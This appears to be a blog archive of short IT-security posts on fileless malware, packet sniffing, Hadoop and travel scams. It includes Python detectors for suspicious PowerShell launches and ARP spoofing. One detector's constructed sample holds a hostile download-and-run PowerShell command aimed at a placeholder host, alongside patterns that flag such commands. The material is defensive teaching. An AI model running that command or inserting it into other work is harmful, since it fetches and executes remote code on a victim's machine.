What Is A Fileless Malware Attack?

Gone are the days when the only way to deliver malware was through malicious files sent in emails. Fileless attacks are now taking over and becoming more common. According to The State of Endpoint Security Risk Report by Ponemon Institute, 77% of the total compromised attacks in 2017 were fileless.

A fileless malware attack, as the name suggests, does not need a malicious program to be installed in order to infect the victim’s machine. It is also known as a zero-footprint, non-malware or macro attack because, unlike traditional malware, it takes advantage of vulnerabilities already present on the user’s device. It usually resides in the computer’s RAM and uses common system tools such as Windows Management Instrumentation and PowerShell to inject the malware.

Since the malware is not delivered through a file, it is often very difficult to prevent, detect and remove. However, the loss can be minimized to a great extent if you reboot your device, as RAM can be exploited only while the device is on.

Features Of Fileless Malware

  • It is difficult for antivirus software to detect the malware as it is not based on identifiable code or a signature.
  • It is memory-based malware.
  • It can be paired with other types of malware as well.
  • Fileless attacks evade whitelisting (the practice by which only approved applications are allowed to be installed on a system).
  • Processes that are native to the operating system are generally used in order to initiate an attack.
  • It generally takes advantage of approved applications that are there on your system.

How Does It Work?
Such an attack may be launched in a variety of ways. You might mistakenly click on a banner ad that redirects you to a legitimate-looking malicious site, which may load Flash on your system. Flash in turn will compromise Windows PowerShell. PowerShell in turn might download malicious code from a botnet and send the data to hackers.

How To Detect?

It is usually difficult to detect a fileless malware attack since it is not launched through files. However, there are certain warning signs that one needs to take note of.

  • Unusual network patterns
  • Compromised memory
  • Unusual snags
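
One way to look for the chain described under "How Does It Work?" (a browser or document program starting PowerShell, which then downloads code) is to score process-creation events. This is an added example, not part of the original article; the event fields, the parent-process list and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Programs that rarely have a legitimate reason to start PowerShell (assumed list)
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "acrord32.exe", "iexplore.exe", "chrome.exe"}
# -EncodedCommand and its accepted short forms (-e, -ec, -enc, ...)
ENC_FLAG = re.compile(r"(?<=\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or ''."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return ""

def assess(event):
    """List the reasons a process-creation event looks like fileless activity."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event["cmdline"]
    script = cmd + " " + decode_encoded_command(cmd)  # inspect the hidden part too
    reasons = []
    if event["parent"].lower() in SUSPECT_PARENTS:
        reasons.append("spawned by " + event["parent"])
    if ENC_FLAG.search(cmd):
        reasons.append("encoded command")
    if re.search(r"(?<=\s)-w[a-z]*\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    if re.search(r"downloadstring|downloaddata|invoke-webrequest", script, re.I):
        reasons.append("downloads content")
    if re.search(r"\biex\b|invoke-expression", script, re.I):
        reasons.append("runs code from a string")
    return reasons

def _enc(script):
    """Encode a constructed sample the way -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed events, not taken from a real incident
    {"parent": "explorer.exe", "image": PS_PATH,
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
    {"parent": "iexplore.exe", "image": PS_PATH,
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/constructed')")},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", assess(ev) or "nothing unusual")
```

A single reason is weak evidence, since administrators also use encoded commands; several reasons on one event are what deserve a closer look.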

Ways To Protect Yourself From Fileless Malware Attack

  • Updating your current software on a regular basis.
  • Keeping a tab on your network traffic.
  • Disabling PDF readers from activating JavaScript.
  • Uninstalling or disabling features that you do not use.
  • Enhancing your endpoint security.
  • Adopting safe practices to use PowerShell.
  • Disabling Flash.
  • Employing password vaults & strengthening user authentication.
  • Educating employees about the attack in order to combat the threat.

For more information about IT Security, call Centex Technologies at (254) 213-4740.


Benefits of Hadoop

Hadoop is an open source distributed processing framework that is commonly used to process and store big data. It not only stores data but also helps in running applications on clusters of commodity hardware.

Software solutions like Hadoop have become a necessity for businesses that store & use big data due to their ability to store & process massive amounts of data. A classic feature of Hadoop is that it can handle both structured & unstructured data, thus providing enhanced flexibility to users.

Reasons To Implement Hadoop

  • Massive Storage – With big data increasing rapidly, there was a need for a software solution that could handle large volumes of data. Hadoop has solved that problem with its ability to hold enormous amounts of data. The data is often split into blocks and then stored in clusters.
  • Scalability – You wish to have the ability to handle more data? No problem, with Hadoop you can do that easily and that too without any hassle. With little administration Hadoop allows you to add more nodes easily.
  • Flexibility – Hadoop enables you to store as much data as you want whether it is structured or unstructured, formatted or encoded or in any other form. So apart from text you can store images, videos, etc. Also, with Hadoop you are not required to process data before storing it, thus making it relevant as well as simple to use.
  • Computing – Its computing model helps in processing large amounts of data easily. The arithmetic is simple: the more nodes you have, the more processing power you have.
  • Fault Tolerance – Hadoop is fault tolerant, i.e. it protects the data in case of any hardware failure. When a node gets lost or goes down, the Hadoop framework redirects the task/work to another node to avoid any disruption. Hadoop also keeps a duplicate copy of data which is then stored in different clusters.
  • More Real Time – It allows you to store information in a cluster and analyze it in real time. It provides a standard approach to numerous APIs for big data analytics.
  • Cost Effective – It uses commodity hardware to store data which leads to reduction in cost per terabyte of storage.

When Not To Use Hadoop?

  • When you wish to modify data
  • When there are lots of small files
  • When there is a need for low latency data access


What Are SQL Injection Attacks & Its Types

PDF Version : What-Are-SQL-Injection-Attacks-&-Its-Types




What Is Packet Sniffing?

Information is often broken into smaller units when it is transmitted over the computer network. These small units known as data packets are fragmented at the sender’s node and are reassembled in their original format at the receiver’s node.

Every data packet has to cross a number of traffic control devices such as routers & switches. However, the data packet is susceptible to the risk of being captured each time it crosses these control devices. This act of collecting data packets illegally by hackers is known as packet sniffing. Hackers often use specialized devices known as packet sniffers to do so.

How Does A Packet Sniffer Work?
A packet sniffer can exist in the form of software or hardware specifically designed to collect the data being transmitted over the network. It intercepts & logs network traffic through the wired or wireless network interface it has access to. Hackers might use it to capture:

  • User names
  • Passwords
  • Downloaded files
  • Emails
  • Audio & video activity
  • Other sensitive information

An illegal packet sniffer is installed somewhere on the network without the knowledge of an IT administrator to gain unauthorized access to confidential information. Hackers also use sniffers to eavesdrop on unencrypted data, to spy on and check out the information being exchanged between the two parties, and to use it for their benefit.

Types Of Packet Sniffing

There are 3 types of packet sniffing. Let us understand how they work:

  • IP Sniffing – It uses the network card to sniff all information packets that correspond with the IP address filter. These information packets are all used for analysis and examination.
  • MAC Sniffing – It also works through a network card and sniffs away the information packets that correspond to MAC address filter.
  • ARP Sniffing – In this type of sniffing, information packets are sent to the administrator through the ARP cache of both network hosts. The traffic is forwarded to the administrator directly instead of sending it to the hosts.

How To Protect Yourself From Packet Sniffing?

  • Use VPN – VPN (Virtual Private Network) connections provide complete privacy and secure your computer’s internet connection. It makes sure that all the data you are sending and receiving is encrypted & secured.
  • Always Check the HTTPS – Make sure that the websites you visit have HTTPS in their URL. HTTPS encrypts the traffic between your browser and the website, so packets captured along the way cannot be read.
  • Be Cautious – The risk of packet sniffing rises when a device is connected to a public Wi-Fi network. So be highly cautious of the websites you visit when you are on that network. Avoid doing financial transactions, entering sensitive information etc.

Other Ways

  • Scan your network
  • Use the Antisniff tool
  • Log out when you are done
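
As one concrete form of "Scan your network", the check below looks for the symptom of the ARP sniffing described above: a host's ARP cache in which one hardware address answers for several IP addresses, or in which a known host (such as the gateway) has changed its hardware address. It is an added example, not part of the original article; the sample table and the baseline are constructed, and the parser assumes `arp -a` / `arp -an` style output.

```python
import re
from collections import defaultdict

IP = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
MAC = re.compile(r"\b(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2}\b", re.I)

def parse_arp_table(text):
    """Yield (ip, mac) pairs; MACs are normalised to lower case with ':'."""
    for line in text.splitlines():
        ip, mac = IP.search(line), MAC.search(line)
        if ip and mac:
            yield ip.group(), mac.group().lower().replace("-", ":")

def is_unicast(mac):
    # Broadcast and multicast addresses have the low bit of the first octet set
    return int(mac[:2], 16) & 1 == 0

def find_arp_anomalies(text, known_good=None):
    """Report MACs that answer for several IPs and IPs that drifted from a baseline."""
    known_good = known_good or {}
    by_mac = defaultdict(set)
    findings = []
    for ip, mac in parse_arp_table(text):
        if not is_unicast(mac):
            continue
        by_mac[mac].add(ip)
        expected = known_good.get(ip)
        if expected and expected.lower() != mac:
            findings.append(f"{ip} is at {mac}, baseline says {expected.lower()}")
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"{mac} answers for {', '.join(sorted(ips))}")
    return findings

# Constructed sample: the gateway (.1) and a workstation (.50) share one MAC
SAMPLE_ARP = """\
? (192.168.1.1) at 52:54:00:aa:bb:cc [ether] on eth0
? (192.168.1.20) at 52:54:00:11:22:33 [ether] on eth0
? (192.168.1.50) at 52:54:00:aa:bb:cc [ether] on eth0
? (192.168.1.255) at ff:ff:ff:ff:ff:ff [ether] on eth0
"""
BASELINE = {"192.168.1.1": "52:54:00:de:ad:01"}  # assumed known-good gateway MAC

if __name__ == "__main__":
    for finding in find_arp_anomalies(SAMPLE_ARP, BASELINE):
        print(finding)
```

A shared hardware address is not always hostile: a router with several addresses or a host doing proxy ARP produces the same pattern, which is why the baseline comparison is reported separately.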



Ticket & Travel Scams

It often seems easy and convenient to make ticket bookings and hotel reservations online. However one has to be highly cautious while doing so to avoid falling prey to a cyber fraud. Since ticket & travel scams are quite common these days, it is important to be vigilant in order to stay protected from numerous travel websites which are tricking people by selling fake tickets.

Here are some of the most common ways in which ticket and travel scams are carried out:

  • Free Or Discounted Vacation – The victim is often sent an email with a congratulatory message that they have won a vacation travel & stay for free or at a discounted rate but they will be required to pay a small fee or provide their credit card details in order to claim the offer.
  • Vacation Ticket Re-Sell Scam – Sometimes the victim falls prey to an ad posted by someone who claims to have purchased a ticket but wishes to re-sell it due to inability to go for the trip because of some personal reasons. Thus, the victim is fooled by an offer of getting tickets at a much lower fare.
  • Location Scam – Fraudsters post an ad of a vacation rental or hotel and when an interested person clicks on it to make the bookings, they are often asked for some security deposit or sometimes even the full amount. However, all their excitement and zeal to spend a perfect vacation goes off when they reach the booked destination and find that no such place exists and that they have been scammed.

Tips To Avoid The Scam:

  • Be Cautious – Look out for hints while scrolling through a website. Most likely a website that does not have an about and contact page would be a scam site. Also check that the URL has ‘https’ to make sure that it is a secure website.
  • Check Reviews Online – To know if the website is safe to use or not, make sure that you check their social media profiles, reviews, blog posts etc. because it is highly unlikely for a fake website to put in efforts for building up all fake reviews and social media handles.
  • Use A Credit Card – Credit cards are more secure than debit cards as they do not allow direct access to your bank account and are in a better position when it comes to protection from fraudulent activities.
